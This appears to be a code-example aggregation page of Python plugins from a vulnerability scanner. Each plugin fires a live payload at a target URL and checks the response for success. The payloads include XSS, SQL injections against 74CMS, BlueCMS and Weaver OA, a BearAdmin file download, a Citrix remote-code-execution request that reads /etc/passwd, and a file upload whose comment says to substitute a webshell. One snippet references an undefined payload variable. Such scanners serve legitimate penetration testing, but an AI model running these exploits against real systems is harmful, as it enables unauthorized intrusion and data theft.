            _l = ClassCongregation.ErrorLog().Write(url, _)  # 调用写入类
Exemplo n.º 22
0
def medusa(Url: str, Headers: dict, proxies: str = None, **kwargs) -> None:
    proxies = ClassCongregation.Proxies().result(proxies)
    scheme, url, port = ClassCongregation.UrlProcessing().result(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port
    try:
        RD = ClassCongregation.randoms().result(20)
        payload = "/aasp_includes/pages/notice.php?e=1<img src=x onerror=alert('{}')>".format(
            RD)
        payload_url = scheme + "://" + url + ":" + str(port) + payload

        resp = requests.get(payload_url,
                            headers=Headers,
                            timeout=6,
                            proxies=proxies,
                            verify=False)
        con = resp.text
        code = resp.status_code
        if code == 200 and con.find(
                '<script>alert({})</script>'.format(RD)) != -1:
            Medusa = "{}存在CraftedWeb跨站脚本漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(
                url, payload_url, con)
            _t = VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(
                _t.info, url, **kwargs).Write()  # 传入url和扫描到的数据
            ClassCongregation.WriteFile().result(
                str(url), str(Medusa))  #写入文件,url为目标文件名统一传入,Medusa为结果
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        _l = ClassCongregation.ErrorLog().Write(
            "Plugin Name:" + _ + " || Target Url:" + url, e)  #调用写入类
Exemplo n.º 23
0
def medusa(Url, RandomAgent, UnixTimestamp):

    scheme, url, port = UrlProcessing(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port
    try:
        payload = "/upload/plus/ajax_street.php?act=key&key=s%e9%8c%a6' or cast(ascii(substring((select md5(c) from qs_admin),1,1))=97 as signed) %23"
        payload_url = scheme + "://" + url + ":" + str(port) + payload
        headers = {
            'User-Agent':
            RandomAgent,
            'Content-Type':
            'application/x-www-form-urlencoded',
            'Accept':
            'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
        }

        s = requests.session()
        resp = s.get(payload_url, headers=headers, timeout=6, verify=False)
        con = resp.text
        code = resp.status_code
        if con.find('4a8a08f09d37b73795649038408b5f33') != -1:
            Medusa = "{}存在74CMS存在SQL注入漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(
                url, payload_url, con)
            _t = VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(
                _t.info, url, UnixTimestamp).Write()  # 传入url和扫描到的数据
            ClassCongregation.WriteFile().result(
                str(url), str(Medusa))  #写入文件,url为目标文件名统一传入,Medusa为结果
    except Exception:
        _ = VulnerabilityInfo('').info.get('algroup')
        _l = ClassCongregation.ErrorLog().Write(url, _)  # 调用写入类传入URL和错误插件名
Exemplo n.º 24
0
def medusa(Url, RandomAgent, ProxyIp):

    scheme, url, port = UrlProcessing(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port
    try:
        payload = "/admin/databack/download.html?name=../application/database.php"
        payload_url = scheme + "://" + url + ":" + str(port) + payload

        headers = {
            'User-Agent':
            RandomAgent,
            'Content-Type':
            'application/x-www-form-urlencoded',
            'Accept':
            'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
        }

        s = requests.session()
        resp = s.get(payload_url, headers=headers, timeout=6, verify=False)
        con = resp.text
        code = resp.status_code
        if code == 200 and con.find("数据库名") != -1:
            Medusa = "{}存在BearAdmin任意文件下载漏洞\r\n 验证数据:\r\nUrl:{}\r\n返回内容:{}\r\n".format(
                url, payload_url, con)
            _t = VulnerabilityInfo(Medusa)
            web = ClassCongregation.VulnerabilityDetails(_t.info)
            web.High()  # serious表示严重,High表示高危,Intermediate表示中危,Low表示低危
            return (str(_t.info))
    except Exception:
        _ = VulnerabilityInfo('').info.get('algroup')
        _l = ClassCongregation.ErrorLog().Write(url, _)  # 调用写入类传入URL和错误插件名
Exemplo n.º 25
0
def medusa(Url, RandomAgent, UnixTimestamp):

    scheme, url, port = UrlProcessing(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port
    try:
        payload_url = scheme + "://" + url + ':' + str(port) + payload
        headers = {
            'Accept-Encoding': 'gzip, deflate',
            'Accept': '*/*',
            'User-Agent': RandomAgent,
        }
        resp = requests.get(payload_url,
                            headers=headers,
                            timeout=5,
                            verify=False)
        con = resp.text
        code = resp.status_code
        if code == 200:
            m = re.search(r'No error in <b>([^<]+)</b>', con)
            if m:
                Medusa = "{}存在泛微任意文件下载漏洞 \r\n漏洞详情:\r\nPayload:{}\r\n".format(
                    url, payload_url)
                _t = VulnerabilityInfo(Medusa)
                ClassCongregation.VulnerabilityDetails(
                    _t.info, url, UnixTimestamp).Write()  # 传入url和扫描到的数据
                ClassCongregation.WriteFile().result(
                    str(url), str(Medusa))  #写入文件,url为目标文件名统一传入,Medusa为结果
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        _l = ClassCongregation.ErrorLog().Write(url, _)  # 调用写入类
Exemplo n.º 26
0
def medusa(Url, RandomAgent, ProxyIp):

    scheme, url, port = UrlProcessing(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port
    try:
        payload = "/ad_js.php?ad_id=1%20and%201=2%20union%20select%201,2,3,4,5,md5(3.1415),md5(3.1415)"
        payload_url = scheme + "://" + url + ":" + str(port) + payload

        headers = {
            'User-Agent':
            RandomAgent,
            'Content-Type':
            'application/x-www-form-urlencoded',
            'Accept':
            'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
        }

        s = requests.session()
        resp = s.get(payload_url, headers=headers, timeout=6, verify=False)
        con = resp.text
        code = resp.status_code
        if con.find("63e1f04640e83605c1d177544a5a0488") != -1:
            Medusa = "{}存在BlueCMSSQL注入漏洞\r\n 验证数据:\r\nUrl:{}\r\n返回内容:{}\r\n".format(
                url, payload_url, con)
            _t = VulnerabilityInfo(Medusa)
            web = ClassCongregation.VulnerabilityDetails(_t.info)
            web.High()  # serious表示严重,High表示高危,Intermediate表示中危,Low表示低危
            return (str(_t.info))
    except Exception:
        _ = VulnerabilityInfo('').info.get('algroup')
        _l = ClassCongregation.ErrorLog().Write(url, _)  # 调用写入类传入URL和错误插件名
Exemplo n.º 27
0
def medusa(Url, RandomAgent, proxies=None, **kwargs):
    proxies = ClassCongregation.Proxies().result(proxies)

    scheme, url, port = UrlProcessing(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port
    payload = "/vpn/../vpns/portal/scripts/newbm.pl"
    payload_url = scheme + "://" + url + ":" + str(port) + payload
    randoms = rand()
    try:
        headers = {
            'Accept-Encoding': 'gzip, deflate',
            'Accept': '*/*',
            'Accept-Language': 'en',
            'User-Agent': RandomAgent,
            "Connection": "close",
            "NSC_USER":
            "******".format(randoms),
            "NSC_NONCE": "nsroot"
        }
        data = "url=http://example.com&title={}&desc=[% template.new('BLOCK' = 'print `cat /etc/passwd`') %]".format(
            randoms)
        resp = requests.post(payload_url,
                             data=data,
                             headers=headers,
                             proxies=proxies,
                             timeout=5,
                             verify=False,
                             allow_redirects=False)
        con = resp.text
        code = resp.status_code
        if code == 200 and con.find("parent.window.ns_reload") != -1:
            payload_url2 = scheme + "://" + url + ":" + str(
                port) + '/vpn/../vpns/portal/{}.xml'.format(randoms)
            headers2 = {
                "NSC_USER": "******",
                "NSC_NONCE": "nsroot",
                "Upgrade-Insecure-Requests": "1",
                "Cache-Control": "max-age=0",
                'Accept-Encoding': 'gzip, deflate',
                'Accept': '*/*',
                'Accept-Language': 'en',
                'User-Agent': RandomAgent,
            }
            resp2 = requests.get(payload_url2,
                                 headers=headers2,
                                 proxies=proxies,
                                 timeout=5,
                                 verify=False)
            con2 = resp2.text
            code2 = resp2.status_code
            if code2 == 200 and con2.find("root:") != -1 and con2.find(
                    "bin:") != -1 and con2.find("/root") != -1:
                Medusa = "{} 存在Citrix远程代码执行漏洞\r\n漏洞地址:\r\n{}\r\n使用POST数据包:\r\n{}\r\n返回数据包:\r\n{}\r\n".format(
                    url, payload_url2, data, con2)
                _t = VulnerabilityInfo(Medusa)
                ClassCongregation.VulnerabilityDetails(
                    _t.info, url, **kwargs).Write()  # 传入url和扫描到的数据
                ClassCongregation.WriteFile().result(
                    str(url), str(Medusa))  #写入文件,url为目标文件名统一传入,Medusa为结果
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        _l = ClassCongregation.ErrorLog().Write(url, _)  # 调用写入类传入URL和错误插件名


# if __name__ == '__main__':
#
#     with open(r'../123.txt', 'r') as file:
#         content_lists = file.readlines()
#         url = [x.strip() for x in content_lists]
#         for l in url:
#             medusa(l)
#medusa("http://","Mozilla/5.0(compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)")
Exemplo n.º 28
0
def Monitor():
    try:
        headers = {
            'Accept-Encoding':
            'gzip, deflate',
            'Accept':
            '*/*',
            'User-Agent':
            "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36",
        }
        GitCveApi = requests.get(
            "https://api.github.com/search/repositories?q=" +
            github_cve_monitor_key + "&sort=updated&order=desc",
            headers=headers,
            timeout=10)
        GitCveApiJson = json.loads(GitCveApi.text)
        DataExtraction = GitCveApiJson["items"]
        for i in DataExtraction:
            GithubId = i["id"]
            Name = i["name"]
            HtmlUrl = i["html_url"]
            CreatedAt = dateutil.parser.parse(i["created_at"]).astimezone(
                pytz.timezone('Asia/Shanghai'))  # 解析string 并转换为北京时区
            Created = str(int(time.mktime(CreatedAt.timetuple())))  # 转换为时间戳
            UpdatedAt = dateutil.parser.parse(i["updated_at"]).astimezone(
                pytz.timezone('Asia/Shanghai'))  # 解析string 并转换为北京时区
            Updated = str(int(time.mktime(UpdatedAt.timetuple())))  # 转换为时间戳
            PushedAt = dateutil.parser.parse(i["pushed_at"]).astimezone(
                pytz.timezone('Asia/Shanghai'))  # 解析string 并转换为北京时区
            Pushed = str(int(time.mktime(PushedAt.timetuple())))  # 转换为时间戳
            ForksCount = i["forks_count"]
            WatchersCount = i["watchers_count"]
            GithubCveSekect = GithubCve(
                id=GithubId,
                name=Name,
                html_url=HtmlUrl,
                created_at=Created,
                updated_at=Updated,
                pushed_at=Pushed,
                forks_count=ForksCount,
                watchers_count=WatchersCount).Judgment()  #先查询数据库
            if GithubCveSekect:
                GithubCve(id=GithubId,
                          name=Name,
                          html_url=HtmlUrl,
                          created_at=Created,
                          updated_at=Updated,
                          pushed_at=Pushed,
                          forks_count=ForksCount,
                          watchers_count=WatchersCount).Update()  #如果存在就更新
            else:
                GithubCve(id=GithubId,
                          name=Name,
                          html_url=HtmlUrl,
                          created_at=Created,
                          updated_at=Updated,
                          pushed_at=Pushed,
                          forks_count=ForksCount,
                          watchers_count=WatchersCount).Write()  #如果不存在就写入

    except Exception as e:
        ClassCongregation.ErrorLog().Write(
            "Web_CVE_GithubMonitoring_Github_Monitor(def)", e)
Exemplo n.º 29
0
def medusa(Url, RandomAgent, UnixTimestamp):

    scheme, url, port = UrlProcessing(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port
    try:
        payload = "/library/editornew/Editor/img_save.asp"
        payload_url = scheme + "://" + url + ":" + str(port) + payload
        data = '''
------WebKitFormBoundaryNjZKAB66SVyL1INA
Content-Disposition: form-data; name="img_src"; filename="123.cer"
Content-Type: application/x-x509-ca-cert

testvul
------WebKitFormBoundaryNjZKAB66SVyL1INA
Content-Disposition: form-data; name="Submit"

提交
------WebKitFormBoundaryNjZKAB66SVyL1INA
Content-Disposition: form-data; name="img_alt"


------WebKitFormBoundaryNjZKAB66SVyL1INA
Content-Disposition: form-data; name="img_align"

baseline
------WebKitFormBoundaryNjZKAB66SVyL1INA
Content-Disposition: form-data; name="img_border"


------WebKitFormBoundaryNjZKAB66SVyL1INA
Content-Disposition: form-data; name="newid"

45
------WebKitFormBoundaryNjZKAB66SVyL1INA
Content-Disposition: form-data; name="img_hspace"


------WebKitFormBoundaryNjZKAB66SVyL1INA
Content-Disposition: form-data; name="img_vspace"


------WebKitFormBoundaryNjZKAB66SVyL1INA--
'''
        headers = {
            'User-Agent':
            RandomAgent,
            'Content-Type':
            'application/x-www-form-urlencoded',
            'Accept':
            'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
        }

        s = requests.session()
        resp = s.post(payload_url,
                      data=data,
                      headers=headers,
                      timeout=6,
                      verify=False)
        con = resp.text
        match = re.search(r'getimg\(\'([\d]+.cer)\'\)', con)
        if match:
            payload_url2 = scheme + "://" + url + ":" + str(
                port) + "/library/editornew/Editor/NewImage/" + match.group(1)
            resp2 = s.get(payload_url2,
                          headers=headers,
                          timeout=6,
                          verify=False)
            con2 = resp2.text
            code2 = resp2.status_code
            #如果要上传shell直接把testvul这个值改为一句话就可以
            if code2 == 200 and con2.lower().find("testvul") != -1:
                Medusa = "{}存在一采通电子采购系统任意文件上传漏洞\r\n 验证数据:\r\nshell地址:{}\r\n内容:{}\r\n".format(
                    url, payload_url2, con2)
                _t = VulnerabilityInfo(Medusa)
                ClassCongregation.VulnerabilityDetails(
                    _t.info, url, UnixTimestamp).Write()  # 传入url和扫描到的数据
                ClassCongregation.WriteFile().result(
                    str(url), str(Medusa))  # 写入文件,url为目标文件名统一传入,Medusa为结果
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        _l = ClassCongregation.ErrorLog().Write(url, _)  # 调用写入类传入URL和错误插件名
Exemplo n.º 30
0
def medusa(Url, RandomAgent, ProxyIp):

    scheme, url, port = UrlProcessing(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port
    global resp
    global resp2
    try:
        payload = "/mobile/browser/WorkflowCenterTreeData.jsp?node=wftype_1&scope=2333"
        payload_url = scheme + "://" + url + ':' + str(port) + payload

        headers = {
            'User-Agent':
            RandomAgent,
            'Content-Type':
            'application/x-www-form-urlencoded',
            'Accept':
            'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
        }

        s = requests.session()
        if ProxyIp != None:
            proxies = {
                # "http": "http://" + str(ProxyIps) , # 使用代理前面一定要加http://或者https://
                "http": "http://" + str(ProxyIp)
            }
            resp = s.post(payload_url,
                          data={
                              'formids':
                              '11111111111)))' + '\x0a\x0d' * 360 +
                              'union select NULL,instance_name from '
                              'v$instance order by (((1'
                          },
                          headers=headers,
                          timeout=6,
                          proxies=proxies,
                          verify=False)
        elif ProxyIp == None:
            resp = s.post(payload_url,
                          data={
                              'formids':
                              '11111111111)))' + '\x0a\x0d' * 360 +
                              'union select NULL,instance_name from '
                              'v$instance order by (((1'
                          },
                          headers=headers,
                          timeout=6,
                          verify=False)
        con = resp.text
        code = resp.status_code
        if code == 200 and con.lower(
        ).find('''"draggable":''') != -1 and con.lower(
        ).find('''"checked":''') != -1 and con.lower().find(
                '''"id":''') != -1 and con.lower().find('''"text":''') != -1:
            Medusa = "{}存在泛微OA_WorkflowCenterTreeData接口注入漏洞\r\n 验证数据:\r\nUrl:{}\r\nPayload:{}\r\n".format(
                url, payload_url, '11111111111)))' + '\x0a\x0d' * 360 +
                'union select NULL,instance_name from '
                'v$instance order by (((1')
            _t = VulnerabilityInfo(Medusa)
            web = ClassCongregation.VulnerabilityDetails(_t.info)
            web.High()  # serious表示严重,High表示高危,Intermediate表示中危,Low表示低危
            return (str(_t.info))
    except:
        _ = VulnerabilityInfo('').info.get('algroup')
        _l = ClassCongregation.ErrorLog().Write(url, _)  #调用写入类